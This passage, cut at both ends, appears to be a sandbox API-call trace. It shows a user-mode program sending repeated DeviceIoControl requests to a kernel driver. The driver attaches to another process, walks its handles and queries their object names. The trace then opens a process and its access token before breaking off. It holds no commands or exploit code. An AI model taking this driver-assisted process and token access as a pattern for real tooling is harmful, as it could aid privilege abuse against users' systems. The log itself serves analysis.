nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0139.678] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.679] PsAcquireProcessExitSynchronization () returned 0x0 [0139.679] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.679] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003870f20, HandleInformation=0x0) returned 0x0 [0139.679] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.679] PsReleaseProcessExitSynchronization () returned 0x2 [0139.679] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.679] ObQueryNameString (in: Object=0xfffffa8003870f20, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.681] ObfDereferenceObject (Object=0xfffffa8003870f20) returned 0x3 [0139.681] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.681] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.681] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0139.681] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.681] PsAcquireProcessExitSynchronization () returned 0x0 [0139.681] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.681] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800387aa50, HandleInformation=0x0) returned 0x0 [0139.682] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.682] PsReleaseProcessExitSynchronization () returned 0x2 [0139.682] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.682] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003000044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003000044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.682] ObfDereferenceObject (Object=0xfffffa800387aa50) returned 0x1 [0139.682] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.682] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.682] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.682] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x56, lpOverlapped=0x0) returned 1 [0139.682] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.682] PsAcquireProcessExitSynchronization () returned 0x0 [0139.682] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.682] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039fb800, HandleInformation=0x0) returned 0x0 [0139.683] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.683] PsReleaseProcessExitSynchronization () returned 0x2 [0139.683] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.683] ObQueryNameString (in: Object=0xfffffa80039fb800, ObjectNameInfo=0xfffffa8003001044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003001044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.683] ObfDereferenceObject (Object=0xfffffa80039fb800) returned 0x2 [0139.683] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.683] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.683] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.683] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0139.683] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.683] PsAcquireProcessExitSynchronization () returned 0x0 [0139.684] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.684] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039fc8d0, HandleInformation=0x0) returned 0x0 [0139.684] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.684] PsReleaseProcessExitSynchronization () returned 0x2 [0139.684] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.684] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003002044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003002044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.684] ObfDereferenceObject (Object=0xfffffa80039fc8d0) returned 0x1 [0139.684] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.684] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.684] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.684] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0139.685] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.685] PsAcquireProcessExitSynchronization () returned 0x0 [0139.685] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.685] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039fe250, HandleInformation=0x0) returned 0x0 [0139.685] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.685] PsReleaseProcessExitSynchronization () returned 0x2 [0139.685] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.685] ObQueryNameString (in: Object=0xfffffa80039fe250, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.685] ObfDereferenceObject (Object=0xfffffa80039fe250) returned 0x14 [0139.685] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.685] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.686] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0139.686] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.686] PsAcquireProcessExitSynchronization () returned 0x0 [0139.686] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.686] ObReferenceObjectByHandle (in: Handle=0x46c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039fd070, HandleInformation=0x0) returned 0x0 [0139.686] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.686] PsReleaseProcessExitSynchronization () returned 0x2 [0139.686] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.686] ObQueryNameString (in: Object=0xfffffa80039fd070, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.687] ObfDereferenceObject (Object=0xfffffa80039fd070) returned 0x1 [0139.687] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.687] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.687] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.687] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0139.687] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.687] PsAcquireProcessExitSynchronization () returned 0x0 [0139.687] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.687] ObReferenceObjectByHandle (in: Handle=0x470, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039fddd0, HandleInformation=0x0) returned 0x0 [0139.687] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.687] PsReleaseProcessExitSynchronization () returned 0x2 [0139.688] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.688] ObQueryNameString (in: Object=0xfffffa80039fddd0, ObjectNameInfo=0xfffffa8003005044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003005044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.688] ObfDereferenceObject (Object=0xfffffa80039fddd0) returned 0x2 [0139.688] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.688] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.688] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.688] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0139.688] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.688] PsAcquireProcessExitSynchronization () returned 0x0 [0139.688] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.688] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039fdc80, HandleInformation=0x0) returned 0x0 [0139.689] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.689] PsReleaseProcessExitSynchronization () returned 0x2 [0139.689] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.689] ObQueryNameString (in: Object=0xfffffa80039fdc80, ObjectNameInfo=0xfffffa8003006044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003006044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.689] ObfDereferenceObject (Object=0xfffffa80039fdc80) returned 0x1 [0139.689] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.689] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.689] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0139.689] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.689] PsAcquireProcessExitSynchronization () returned 0x0 [0139.689] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.690] ObReferenceObjectByHandle (in: Handle=0x57c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0139.690] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.690] PsReleaseProcessExitSynchronization () returned 0x2 [0139.690] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.690] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa8003007044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003007044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.690] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x4 [0139.690] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.690] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.690] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.690] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0139.690] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.690] PsAcquireProcessExitSynchronization () returned 0x0 [0139.691] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.691] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003aba990, HandleInformation=0x0) returned 0x0 [0139.691] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.691] PsReleaseProcessExitSynchronization () returned 0x2 [0139.691] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.691] ObQueryNameString (in: Object=0xfffffa8003aba990, ObjectNameInfo=0xfffffa8003008044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003008044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.691] ObfDereferenceObject (Object=0xfffffa8003aba990) returned 0x2 [0139.691] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.691] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.691] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.691] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0139.692] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.692] PsAcquireProcessExitSynchronization () returned 0x0 [0139.692] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.692] ObReferenceObjectByHandle (in: Handle=0x584, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003abac80, HandleInformation=0x0) returned 0x0 [0139.692] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.692] PsReleaseProcessExitSynchronization () returned 0x2 [0139.692] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.692] ObQueryNameString (in: Object=0xfffffa8003abac80, ObjectNameInfo=0xfffffa8003009044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003009044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.692] ObfDereferenceObject (Object=0xfffffa8003abac80) returned 0x1 [0139.692] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.692] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.692] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0139.693] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.693] PsAcquireProcessExitSynchronization () returned 0x0 [0139.693] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.693] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0139.693] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.693] PsReleaseProcessExitSynchronization () returned 0x2 [0139.693] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.693] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa800300a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800300a044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.693] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0139.693] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.693] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.693] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.693] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0139.693] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.694] PsAcquireProcessExitSynchronization () returned 0x0 [0139.694] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.694] ObReferenceObjectByHandle (in: Handle=0x660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a5af20, HandleInformation=0x0) returned 0x0 [0139.694] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.694] PsReleaseProcessExitSynchronization () returned 0x2 [0139.694] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.694] ObQueryNameString (in: Object=0xfffffa80026ec8a0, ObjectNameInfo=0xfffffa800300b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800300b044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.694] ObfDereferenceObject (Object=0xfffffa8003a5af20) returned 0x1 [0139.694] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.694] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.694] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.694] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0139.694] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.694] PsAcquireProcessExitSynchronization () returned 0x0 [0139.695] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.695] ObReferenceObjectByHandle (in: Handle=0x6a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a033a0, HandleInformation=0x0) returned 0x0 [0139.695] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.695] PsReleaseProcessExitSynchronization () returned 0x2 [0139.695] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.695] ObQueryNameString (in: Object=0xfffffa8003a033a0, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0139.695] ObfDereferenceObject (Object=0xfffffa8003a033a0) returned 0x11 [0139.695] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.695] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.695] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.695] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0139.695] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.696] PsAcquireProcessExitSynchronization () returned 0x0 [0139.697] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0139.697] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034d2d10, HandleInformation=0x0) returned 0x0 [0139.697] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.698] PsReleaseProcessExitSynchronization () returned 0x2 [0139.698] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0139.698] ObQueryNameString (in: Object=0xfffffa80034d2d10, ObjectNameInfo=0xfffffa8002f73504, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f73504, ReturnLength=0xfffff88005163550) returned 0x0 [0139.698] ObfDereferenceObject (Object=0xfffffa80034d2d10) returned 0x1 [0139.698] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.698] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x370) returned 0xc8 [0139.698] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0139.699] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800382ab30, HandleInformation=0x0) returned 0x0 [0139.699] ObOpenObjectByPointer (in: Object=0xfffffa800382ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000654) returned 0x0 [0139.699] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d1 [0139.699] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa8001fcd600 | out: 